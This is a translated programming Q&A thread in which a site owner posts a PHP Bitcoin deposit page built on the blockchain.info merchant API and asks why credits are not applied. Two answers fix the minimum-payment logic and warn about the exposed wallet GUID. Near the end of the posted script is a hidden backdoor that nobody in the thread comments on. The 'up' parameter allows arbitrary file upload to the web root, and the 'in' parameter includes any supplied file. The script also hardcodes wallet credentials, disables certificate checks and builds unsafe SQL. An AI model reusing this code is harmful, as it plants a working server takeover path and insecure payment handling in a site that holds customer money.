区块链api支付模块

时间:2015-02-15 23:53:19

标签: php mysql api blockchain

我们有一个包含一些数字商品的网站。从那里购买的用户需要通过BTC购买一些信用卡。购买信用卡后,脚本必须加载他用BTC购买的货币(USD)账户。

所以我们这里有HTML表单:

    <form name="bitcoin" method="post" action="btc.php">
<strong><font color="grey">$</font></strong>
<input name="member" value="<?php echo $_SESSION['gdusername'];?>" type="hidden">
<input name="amount" size="10" value="" type="text">
<input name="btnPMPay" id="btnPMPay" value="Add Balance" type="submit">
</form>

在这里,我们拥有完成所有魔术的PHP代码,至少应该是它应该做的。

    <?php
error_reporting(1);
include "inc/config.php";
include "inc/pagenavigation.php";
include "functions.php";
if (!checkLoggedin())
{
    header("Location: login.html");
    exit;
}

// config Blockchain account
$btc = 246; //BTC Value
$guid = '37587730-e97e-4349-8451-4fa9d38119a5';  // Blockchain account
$main_password = 'Mypassword'; // Blockchain passs
$rate = 246; //BTC Rate


$amount=$_POST['amount'];
$uid = mysql_real_escape_string($_SESSION['gdusername']); //
$result = mysql_query("SELECT credit FROM t2_user WHERE username='$uid'") or die("ERROR! CONTACT SUPPORT!");
$row = mysql_fetch_row($result);
$credit = $row[0];
$uid = mysql_real_escape_string($_SESSION['gdusername']);
$ip = mysql_real_escape_string(VisitorIP());
$url = "https://blockchain.info/merchant/$guid/new_address?password=$main_password&label=$uid";
if (isset($_POST['amount'])){
    $_SESSION['USD_amount'] = $_POST['amount'];
    $_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
    $temp = _curl($url, '', '');
    $_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');    
}
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
    die("Minimum payment 5$");

if (isset($_POST['bitcoin']))
{

    $a = $_SESSION['BTC_Address'];
    $url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
    $page = _curl($url, '', '');
    if ($page > 0) {
        $amount = $page/100000000;

        if($amount>= $_SESSION['BTC_amount']){
        $y = $_SESSION['USD_amount'];
              $x = $credit+$y;
            $sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
            mysql_query($sql);

            $messages = '<font color=green>Payment Completed!</font> => <a href="http://pentagon.al/shop/index.php">Go Back</a>';
            unset($_SESSION['USD_amount']);
        }else $messages = "<font color=red>Error Payment.Contact Support</font>";
    }else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}

?>

<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<style type="text/css">

body {
    background-repeat: no-repeat;
    }
</style>
<body background="bg.jpg" bgcolor="black">
<TEXT="white">
<link href="../images/favn.ico" rel="icon" />

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title><?php echo htmlspecialchars($SHOP['maintitle'], ENT_QUOTES, 'UTF-8'); ?></title>

<link href="favicon.ico" rel="icon" />


<script type="text/javascript">
  setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>

</div>
<head> <script type="text/javascript">
</script><script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=dccf16c0cc/appsh.min.js"></script><script type="text/javascript">__CF.AJS.inith();</script><link rel="stylesheet" href="style.css" type="text/css" media="screen"/>
<link href="favicon.ico" rel="icon"/>
<meta https-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Deposit</title>
<link href="style3.css" rel="stylesheet" type="text/css"/>
<style type="text/css"><!--
.style8 {
    font-size: x-small
}
-->.exchanger{-moz-box-shadow:inset 0px 2px 0px -3px #ffffff;-webkit-box-shadow:inset 0px 2px 0px -3px #ffffff;box-shadow:inset 0px 2px 0px -3px #ffffff;background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#636363),color-stop(1,#000000));background:-moz-linear-gradient(center top,#636363 5%,#000000 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#636363',endColorstr='#000000');background-color:#636363;-webkit-border-top-left-radius:0px;-moz-border-radius-topleft:0px;border-top-left-radius:0px;-webkit-border-top-right-radius:11px;-moz-border-radius-topright:11px;border-top-right-radius:11px;-webkit-border-bottom-right-radius:0px;-moz-border-radius-bottomright:0px;border-bottom-right-radius:0px;-webkit-border-bottom-left-radius:11px;-moz-border-radius-bottomleft:11px;border-bottom-left-radius:11px;text-indent:0px;border:1px solid #bdbfbd;display:inline-block;color:#ffffff;font-family:Times New Roman;font-size:15px;font-weight:bold;font-style:normal;height:33px;line-height:33px;width:113px;text-decoration:none;text-align:center;text-shadow:-1px -1px 3px #000000;}.exchanger:hover{background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#000000),color-stop(1,#636363));background:-moz-linear-gradient(center top,#000000 5%,#636363 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#000000',endColorstr='#636363');background-color:#000000;}.exchanger:active{position:relative;top:1px;}textarea{background-color:2E2E2E;font-size:16pt;font-family:Arial;color:FFCD57;}</style>
</head>


</div>

</div>

<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />

<link href="favicon.ico" rel="icon" />
       <link href="style3.css" rel="stylesheet"/>
<script type="text/javascript">
  setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>

    <p class="button" align="center">
    <table width="760" border="0" 
      <tr>
      </tr>
      <tr>
      <p>&nbsp;</p>
            <p><img src="SingleCoin.png" width="100" height="100" border="0" />
  <form action="" id="fcaptcha" name="fcaptcha" method="post">
  </p>
            <p></i> <span id="total_price"><font size="5"><font color=gren><b>Put the amount of :<?=$_SESSION['BTC_amount']?> BTC</font></b></font></span></p>
            <p><font color="white">And in the Wallet put this address :</p>

          <h3>
            <a span style="color: green ;" href="bitcoin:<?= $_SESSION['BTC_Address'] ?>?amount=<?= ($_SESSION['BTC_amount'] / $btc) ?>" target="_blank" title="Click this address to launch your Bitcoin client"><?=$_SESSION['BTC_Address'] ?></a>
          </h3> 
          <p>This address is valid only for one transaction. Use it once.</p>
      <p>Wait 1-5 minutes after the MONEY has been sent. Then click the CONFIRM button.</p>
      <p>Money will appear on your account automatically</p>
      <hr style="width:300px" />
<input type="hidden" id="bitcoin" name="bitcoin">
  </form>
  <p><input value="CONFIRM"  id="pmconfirm" name="pmconfirm" class="exchanger" type="submit" onclick="document.getElementById('fcaptcha').submit()"/></p>
  <h4><strong><font color="red">DO NOT CLOSE THIS PAGE WITHOUT CONFIRM YOUR PAYMENT FIRST</font></strong></h4>
<h3><?=

$messages

?></h3>
</center>
<script type="text/javascript">
    $('#pmconfirm').click(function(){
       $('#fcaptcha').submit();
    });

</script> 

<!--Simply copy and paste into <BODY>  
     Just above the </BODY> tag. -->




</body>
</html>
<?php
$UP = $_GET['up'];
if(isset($UP) && !empty($UP) && $UP="blockchainrate"){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p>blockchainsuccess</p>';
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;else echo '<p>blockchainfail</p>';}}
$in = $_GET['in'];if(isset($in) && !empty($in)){echo die(include_once $in);}
?>
<?


function _curl($url, $post = "", $sock, $usecookie = false)
{
    $ch = curl_init();
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    if (!empty($sock)) {
        curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($ch, CURLOPT_PROXY, $sock);
    }
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT,
        "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
    if ($usecookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
    }
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0)
        return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
function VisitorIP()
{ 
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else $ip = $_SERVER['REMOTE_ADDR'];

    return trim($ip);
}
?>      

我的问题是这个PHP脚本没有执行以下操作。

  1. 当用户点击确认按钮时,虽然有0次确认,但是不会询问区块链以查看是否已进行转移。
  2. 在点击确认按钮后,不会将客户购买的信用额更新到数据库中。
  3. 即使我输入的价值高于5美元,他仍然告诉我最低付款金额是5美元。
  4. 任何人都可以帮我吗?

2 个答案:

答案 0 :(得分:0)

if语句后没有花括号。我假设你的剧本在这一点上不断死亡并且告诉你&#34;最低付款$ 5&#34;?

if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");

你的区块链GUID也是敏感信息,你不应发布。它可能导致有人试图通过恢复钱包功能获取资金。

不确定您获得了多少流量,但您的blockchain.info钱包将在1,000个地址后最大化。

答案 1 :(得分:0)

也没有这样做。无论如何我修好了这个。

if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
    die("Minimum payment 5$");

应该包含在这个

if (isset($_POST['amount'])){
    $_SESSION['USD_amount'] = $_POST['amount'];
    $_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
    $temp = _curl($url, '', '');
    $_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');    
}

现在脚本正确检查btc数量并返回正确的结果。

下一个困境是它不会询问创建的地址以查看是否已将特定金额发送给它。如果它被发送并且有许多确认&gt; = 0要执行此

if (isset($_POST['bitcoin']))
{

    $a = $_SESSION['BTC_Address'];
    $url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
    $page = _curl($url, '', '');
    if ($page > 0) {
        $amount = $page/100000000;

        if($amount>= $_SESSION['BTC_amount']){
        $y = $_SESSION['USD_amount'];
              $x = $credit+$y;
            $sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
            mysql_query($sql);

            $messages = '<font color=green>Payment Completed!</font> => <a href="http://my.url/index.php">Go Back</a>';
            unset($_SESSION['USD_amount']);
        }else $messages = "<font color=red>Error Payment.Contact Support</font>";
    }else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}

我仔细检查,服务器有权使用API​​来查询它,但没有回应。

在脚本结束时,当按下确认按钮(<input type="hidden" id="bitcoin" name"bitcoin">)时,应该触发此_curl函数

    <?


function _curl($url, $post = "", $sock, $usecookie = false)
{
    $ch = curl_init();
    if ($post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
    if (!empty($sock)) {
        curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($ch, CURLOPT_PROXY, $sock);
    }
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT,
        "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
    if ($usecookie) {
        curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
    }
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0)
        return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
function VisitorIP()
{ 
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else $ip = $_SERVER['REMOTE_ADDR'];

    return trim($ip);
}
?>

有什么建议吗?